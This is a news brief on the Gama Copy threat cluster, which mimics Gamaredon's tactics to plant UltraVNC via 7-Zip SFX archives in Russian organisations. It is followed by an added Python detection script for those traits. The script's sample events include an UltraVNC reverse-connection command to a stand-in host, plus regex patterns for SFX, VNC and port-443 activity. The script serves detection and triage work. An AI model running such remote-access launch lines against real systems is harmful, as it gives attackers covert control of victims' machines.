
Attacks by Gamaredon copycat target Russia


Organizations across Russia have been targeted by the newly emergent Gama Copy threat cluster, which leverages Russian state-backed hacking operation Gamaredon's tools, in new attacks aimed at spreading UltraVNC for remote compromise, The Hacker News reports.

Gama Copy's intrusions also closely resemble those of the advanced persistent threat operation Core Werewolf, also known as PseudoGamaredon and Awaken Likho: both groups use 7-Zip self-extracting (SFX) archives to launch UltraVNC, connect to their servers over port 443, and use the EnableDelayedExpansion command, according to an analysis from the Knownsec 404 Advanced Threat Intelligence team. "Since its exposure, [Gama Copy] has frequently mimicked the TTPs used by the Gamaredon organization and cleverly used open-source tools as a shield to achieve its own goals while confusing the public," said Knownsec 404. The finding follows a Kaspersky report detailing Core Werewolf spear-phishing attacks against Russian entities that used 7z SFX archives to deploy the MeshCentral platform.
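To turn the overlap described above into something an analyst can check, here is an added Python example that is not part of the SC Media brief or of Knownsec 404's analysis. It scores constructed process-creation events for the traits the brief lists: an executable running from a 7-Zip SFX extraction directory, an UltraVNC binary, a reverse connection to port 443, and EnableDelayedExpansion in a batch command line. The `key="value"` log schema, the `7zS*.tmp` / `7ZipSfx.NNN` directory heuristic, and every path and address in the sample events are assumptions made for this illustration, not indicators from the report.

```python
"""Added example: flag endpoint events that combine the TTPs attributed to
Gama Copy and Core Werewolf (7z SFX, UltraVNC, port 443, EnableDelayedExpansion).
Not code from the brief or from Knownsec 404; schema and samples are constructed."""
import re
from typing import Dict, List, Tuple

# Constructed sample telemetry, one event per line. The key="value" layout
# is an assumed schema for this example, not any vendor's format.
SAMPLE_EVENTS = [
    # UltraVNC launched from an SFX temp directory, reverse-connecting on 443
    r'type="process" image="C:\Users\ivan\AppData\Local\Temp\7zS4F2A.tmp\winvnc.exe" cmdline="winvnc.exe -connect 203.0.113.10::443 -run"',
    # Batch stage from the same SFX directory using delayed expansion
    r'type="process" image="C:\Windows\System32\cmd.exe" cmdline="cmd.exe /c setlocal EnableDelayedExpansion & call C:\Users\ivan\AppData\Local\Temp\7zS4F2A.tmp\run.bat"',
    # A legitimately installed UltraVNC service: one trait only, not flagged
    r'type="process" image="C:\Program Files\UltraVNC\winvnc.exe" cmdline="winvnc.exe -service"',
    # Benign noise
    r'type="process" image="C:\Windows\System32\notepad.exe" cmdline="notepad.exe notes.txt"',
]

FIELD = re.compile(r'(\w+)="([^"]*)"')
# Assumed heuristic: 7-Zip SFX modules unpack into %TEMP%\7zS<hex>.tmp or 7ZipSfx.NNN
SFX_TEMP_DIR = re.compile(r'\\(7zS[0-9A-Fa-f]+\.tmp|7ZipSfx\.\d{3})\\', re.I)
ULTRAVNC = re.compile(r'(winvnc|vncviewer|ultravnc)', re.I)
# UltraVNC reverse connection syntax: -connect host::port (or host:port)
REVERSE_443 = re.compile(r'-connect\s+\S+?:{1,2}443\b', re.I)
DELAYED_EXP = re.compile(r'EnableDelayedExpansion', re.I)


def parse_event(line: str) -> Dict[str, str]:
    """Parse one key="value" event line into a dict."""
    return dict(FIELD.findall(line))


def indicators(event: Dict[str, str]) -> List[str]:
    """Return the names of the TTP traits present in a single event."""
    image = event.get("image", "")
    cmdline = event.get("cmdline", "")
    text = f"{image} {cmdline}"
    hits: List[str] = []
    if SFX_TEMP_DIR.search(text):
        hits.append("sfx_extraction_dir")
    if ULTRAVNC.search(text):
        hits.append("ultravnc")
    if REVERSE_443.search(cmdline):
        hits.append("reverse_connect_443")
    if DELAYED_EXP.search(cmdline):
        hits.append("delayed_expansion_batch")
    return hits


def triage(lines: List[str], threshold: int = 2) -> List[Tuple[int, List[str]]]:
    """Flag events showing at least `threshold` traits; returns (index, traits)."""
    flagged = []
    for idx, line in enumerate(lines):
        hits = indicators(parse_event(line))
        if len(hits) >= threshold:
            flagged.append((idx, hits))
    return flagged


if __name__ == "__main__":
    for idx, hits in triage(SAMPLE_EVENTS):
        print(f"event {idx}: {', '.join(hits)}")
```

Requiring two or more traits per event keeps a legitimately installed UltraVNC service or a lone EnableDelayedExpansion batch file from firing on its own; the threshold and the directory heuristic are the knobs to tune against an environment's own baseline.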
